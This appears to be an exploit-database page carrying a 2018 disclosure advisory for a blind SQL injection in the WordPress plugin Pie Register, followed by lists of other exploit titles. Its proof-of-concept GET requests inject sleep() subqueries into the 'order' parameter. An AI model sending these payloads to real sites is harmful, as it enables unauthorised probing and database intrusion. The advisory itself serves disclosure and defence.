Menu

Search for hundreds of thousands of exploits

"WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection"

Author

Exploit author

"Manuel García Cárdenas"

Platform

Exploit platform

php

Release date

Exploit published date

2018-06-11

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
# Title: WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection
# Author: Manuel García Cárdenas
# Date: 2018-05-10
# Software: WordPress Plugin Pie Register 3.0.9
# CVE: CVE-2018-10969

# I. VULNERABILITY
# WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection

# II. BACKGROUND
# Pie-Register is a quick and easy way to brand your Registration Pages on
# WordPress sites.

# III. DESCRIPTION
# This bug was found using the portal in the files:
# /pie-register/classes/invitation_code_pagination.php:    if ( isset(
# $_GET['order'] ) && $_GET['order'] )
# /pie-register/classes/invitation_code_pagination.php:    $order =
# $_GET['order'];
# And when the query is executed, the parameter "order" it is not sanitized.
# /pie-register/classes/invitation_code_pagination.php:    $this->order = esc_sql( $order );

# IV. PROOF OF CONCEPT
# The following URL have been confirmed to all suffer from Time Based SQL Injection.

GET
/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc
(original)

GET
/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(2)))a)
HTTP/1.1(2 seconds of response)

GET
/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(30)))a)
HTTP/1.1(30 seconds of response)

# V. SYSTEMS AFFECTED
# Pie Register <= 3.0.9

# VI. DISCLOSURE TIMELINE
# May 10, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
# May 10, 2018 2: Send to vendor without response
# June 05, 2018 3: Second email to vendor without response
# June 11, 2018 4: Send to the Full-Disclosure lists

# VII. Solution
# Disable plugin until a fix is available
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-05-21 "Composr CMS 10.0.30 - Persistent Cross-Site Scripting" webapps php "Manuel García Cárdenas"
2019-09-13 "phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery" webapps php "Manuel García Cárdenas"
2019-03-13 "WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion" webapps php "Manuel García Cárdenas"
2018-09-19 "WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion" webapps php "Manuel García Cárdenas"
2018-09-19 "WordPress Plugin Localize My Post 1.0 - Local File Inclusion" webapps php "Manuel García Cárdenas"
2018-06-11 "WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection" webapps php "Manuel García Cárdenas"
2018-04-18 "Kodi 17.6 - Persistent Cross-Site Scripting" webapps multiple "Manuel García Cárdenas"
2018-03-12 "TextPattern 4.6.2 - 'qty' SQL Injection" webapps php "Manuel García Cárdenas"
2018-01-12 "PyroBatchFTP < 3.19 - Buffer Overflow" dos windows "Manuel García Cárdenas"
2017-12-15 "Sync Breeze 10.2.12 - Denial of Service" dos windows "Manuel García Cárdenas"
2017-04-11 "WordPress Plugin Spider Event Calendar 1.5.51 - Blind SQL Injection" webapps php "Manuel García Cárdenas"
2016-09-22 "Exponent CMS 2.3.9 - Blind SQL Injection" webapps php "Manuel García Cárdenas"
2016-04-26 "ImpressCMS 1.3.9 - SQL Injection" webapps php "Manuel García Cárdenas"
2016-02-04 "UliCMS v9.8.1 - SQL Injection" webapps php "Manuel García Cárdenas"
2015-10-06 "PHP-Fusion 7.02.07 - Blind SQL Injection" webapps php "Manuel García Cárdenas"
2014-11-17 "WebsiteBaker 2.8.3 - Multiple Vulnerabilities" webapps php "Manuel García Cárdenas"
2014-11-17 "Zoph 0.9.1 - Multiple Vulnerabilities" webapps php "Manuel García Cárdenas"
2014-11-13 "Piwigo 2.6.0 - 'picture.php?rate' SQL Injection" webapps php "Manuel García Cárdenas"
2013-09-30 "XAMPP 1.8.1 - 'lang.php?WriteIntoLocalDisk method' Local Write Access" webapps php "Manuel García Cárdenas"
2013-06-04 "Telaen 2.7.x - Open Redirection" webapps php "Manuel García Cárdenas"
2013-06-04 "Telaen 2.7.x - Cross-Site Scripting" webapps php "Manuel García Cárdenas"
2013-06-03 "Telaen - Information Disclosure" webapps php "Manuel García Cárdenas"
2013-03-10 "Asteriskguru Queue Statistics - 'warning' Cross-Site Scripting" webapps php "Manuel García Cárdenas"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.